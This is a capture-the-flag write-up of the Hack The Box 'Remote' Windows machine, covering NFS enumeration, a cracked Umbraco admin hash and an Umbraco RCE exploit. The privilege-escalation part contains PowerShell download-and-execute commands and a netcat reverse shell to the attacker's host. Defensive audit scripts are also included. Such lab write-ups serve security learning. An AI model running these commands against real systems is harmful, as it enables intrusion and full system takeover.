Hack The Box — Remote Write-up

Mayk
7 min read · Sep 14, 2020


Remote info card

Summary

Remote is an easy-difficulty Windows box from the Hack The Box platform, retired on 5 September 2020 at 19:00:00 UTC. Pwning it comes down to enumeration and the exploitation of a vulnerability in the Umbraco CMS web application. On top of that, we get to use a PowerSploit script to abuse a vulnerable service running on the target.

Scanning and Enumeration

After adding an entry to our /etc/hosts file, we run a typical scan to check which ports are open. The first command collects the open port numbers into a comma-separated list; the second runs service and OS detection against only those ports.

$ ports=$(sudo nmap -p- --min-rate=1000 -T4 remote.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
$ sudo nmap -p"$ports" -T4 -Pn -A remote.htb

The result is a bunch of open ports:

PORT      STATE SERVICE       VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2016 (92%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Server 2016 build 10586 - 14393 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m37s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-18T20:40:34
|_ start_date: N/A

NFS

From the results above, we can see that the target exposes an NFS (Network File System) export. There are several ways to inspect it. For instance, we can use an nmap script:

$ nmap --script nfs-showmount -p111 remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 21:44 -03
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.16s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /site_backups

We can also use showmount as follows:

$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The next step is to mount this export on our system (the /tmp/nfs mount point must exist first):

$ sudo mount -t nfs remote.htb:/site_backups /tmp/nfs
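Seen from the defender's side, the issue is an export that every client is allowed to mount. The following is an added audit snippet, not code from the write-up, for a Windows host running the Server for NFS role: it uses the NFS module's Get-NfsShare and Get-NfsSharePermission cmdlets, and the property and value names it tests (ClientName 'All Machines', Permission 'no-access', AnonymousAccess) are assumptions taken from that module's documented output.

```powershell
# Added audit snippet, not part of the write-up. Assumes the Windows "Server for NFS" role
# and its NFS PowerShell module. The property/value names below are assumptions based on
# the module's documented output; compare them with Get-NfsSharePermission on your host.
Import-Module NFS

function Get-OpenNfsExport {
    # Returns one record per export that any client can mount (the "(everyone)" that
    # showmount -e reported for /site_backups), plus whether anonymous access is enabled.
    foreach ($share in Get-NfsShare) {
        $global = Get-NfsSharePermission -Name $share.Name |
            Where-Object { $_.ClientName -eq 'All Machines' -and $_.Permission -ne 'no-access' }
        if (-not $global) { continue }
        [pscustomobject]@{
            Share           = $share.Name
            Path            = $share.Path
            Permission      = $global.Permission
            AllowRootAccess = $global.AllowRootAccess
            AnonymousAccess = $share.AnonymousAccess
        }
    }
}

Get-OpenNfsExport | Format-Table -AutoSize

# Remediation for a hit: remove the 'All Machines' entry with Revoke-NfsSharePermission and
# grant named hosts only (Grant-NfsSharePermission ... -ClientType host -Permission readonly),
# checking the parameter names against your server version. Backups that contain an
# application database (Umbraco.sdf here) should not be exported at all.
```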

Navigating through the mounted share we can find a file called Umbraco.sdf.

Listing files from the mounted NFS share

Now, .sdf is the extension of database files used by SQL Server Compact Edition, which means this file could contain data about the application it belongs to. Before reaching for third-party tools to handle this kind of file, we should try extracting strings from it.

The output from command ‘strings Umbraco.sdf’

Nice shot! We have what is very likely a SHA1 password hash for the user admin@htb.local. Submitting this hash to CrackStation gives us the original clear text: baconandcheese.

Enumerating the mounted NFS share a little further, particularly the file App_Data/Logs/UmbracoTraceLog.remote.txt, we can see a reference to an application running at http://192.168.195.149:80/umbraco.

HTTP

This is the web page we are presented with when visiting http://remote.htb:

Home page for http://remote.htb

However, if we go to http://remote.htb/umbraco we are presented with a login page. There, we can use the credentials found in the previous step: admin@htb.local:baconandcheese.

A login page at http://remote.htb/umbraco

Once inside the application, we can find the exact version of the Umbraco web application, which is 7.12.4.

Getting a Foothold

A Google search returns an exploit for this version that allows us to perform remote code execution on the target:
https://github.com/noraj/Umbraco-RCE: Umbraco CMS 7.12.4 — (Authenticated) Remote Code Execution.

Usage examples from the repository:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

We can test this exploit with the credentials we have:

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c whoami
iis apppool\defaultapppool
$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "Get-Command nc"
Get-Command : The term 'nc' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-Command nc
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (nc:String) [Get-Command], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.GetCommandCommand

From the two commands above, we see that we can execute commands remotely as iis apppool\defaultapppool and that there is no nc command on the target.

Owning User

The user flag can be grabbed straight from the exploit by sending a command that reads the file (the closing double quote was missing in the original command):

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "Get-Content C:\\\\Users\\\\Public\\\\user.txt"

Owning System

In order to get admin access to the system, we start by running a privesc check with the PowerUp.ps1 script from PowerSploit.

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/Privesc/PowerUp.ps1'); Invoke-AllChecks"

In the command above, we instruct the target to download the script from the web server running on our machine and to run it directly from memory (no disk footprint).

The command output is listed below:

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...

ServiceName : UsoSvc
Path : c:\windows\temp\badhappy41.exe
ModifiableFile : C:\windows\temp\badhappy41.exe
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : IIS APPPOOL\DefaultAppPool
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'UsoSvc'
CanRestart : True

[*] Checking service permissions...

ServiceName : UsoSvc
Path : c:\windows\temp\badhappy41.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True

[*] Checking %PATH% for potentially hijackable DLL locations...
Test-Path : Access is denied
At line:856 char:46
+ ... if($ParentPath -and (Test-Path -Path $ParentPath)) {
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Windows\syst...Local\Microsoft:String) [Test-Path], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.TestPathCommand

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

The next step is to abuse the service listed above (which runs as LocalSystem) in order to get a SYSTEM shell, using Invoke-ServiceAbuse -Name 'UsoSvc'.

Preparation

First, we need to know which files and directories we have permission to write to. PowerUp's Get-ModifiablePath does this check for us:

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/Privesc/PowerUp.ps1'); Get-ChildItem -R 'C:/site_backups' | Get-ModifiablePath"

The output contains several paths, one being C:\site_backups\App_Data\TEMP.

Let's use the exploit to instruct the target to download the netcat binary from our server into that writable directory:

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "(New-Object Net.WebClient).DownloadFile('http://10.10.15.15:8000/nc.exe', 'C:/site_backups/App_Data/TEMP/nc.exe')"

Finally, with a listener waiting on port 80 of our machine, we abuse the vulnerable service in order to get a reverse shell:

$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/PowerUp.ps1'); Invoke-ServiceAbuse -Name 'UsoSvc' -Command 'C:/site_backups/App_Data/TEMP/nc.exe 10.10.15.15 80 -e C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'"
ServiceAbused Command
------------- -------
UsoSvc C:/site_backups/App_Data/TEMP/nc.exe 10.10.15.15 80 -e C:\Windows\System32\WindowsPowerShell\v1.0\...

That’s it! Once connected to the target as Administrator, just grab the root flag at C:\Users\Administrator\Desktop\root.txt.
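From a hardening standpoint, the root cause of the privilege escalation is a service running as LocalSystem whose executable sits in a world-writable directory and can be replaced by the IIS application pool identity. The script below is an added defender-side check, not code from the write-up or from PowerSploit: it enumerates LocalSystem services and reports any whose binary grants write, delete, or ownership rights to an identity other than SYSTEM, Administrators and TrustedInstaller. The path-parsing regex and the trusted-identity list are assumptions.

```powershell
# Added defender-side check, not part of the write-up or of PowerSploit. Run it as an
# administrator on the host being audited; only built-in cmdlets are used.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # The service ImagePath may be quoted or unquoted and may carry arguments.
    # Assumption: an unquoted path ends at the first ".exe".
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Find-WritableSystemServiceBinary {
    # Identities expected to be able to modify service binaries (assumed trusted set).
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    # Rights that let a caller replace or swap the file. Delete alone is enough when the
    # parent directory is writable, which is why C:\Windows\Temp is a poor home for a service.
    $mask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.StartName -eq 'LocalSystem' }) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $bin)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $bin).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($trusted -contains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band [int]$mask) -eq 0) { continue }
            [pscustomobject]@{
                Service  = $svc.Name
                Binary   = $bin
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableSystemServiceBinary | Format-Table -AutoSize

# Remediation for a hit such as UsoSvc -> c:\windows\temp\badhappy41.exe: move the binary to a
# protected location, reset its ACL so only SYSTEM and Administrators can write, and re-point
# the service at it (the vendor path below is a placeholder), e.g.
#   sc.exe config UsoSvc binPath= "C:\Program Files\Vendor\service.exe"
#   icacls "C:\Program Files\Vendor\service.exe" /inheritance:r /grant:r "SYSTEM:(F)" "Administrators:(F)" "Users:(RX)"
```

PowerUp's second finding (CanRestart and the "service permissions" check) concerns the service object's own DACL rather than the file; `sc.exe sdshow UsoSvc` prints it in SDDL so you can confirm which identities may start, stop or reconfigure the service.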

Written by Mayk

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.
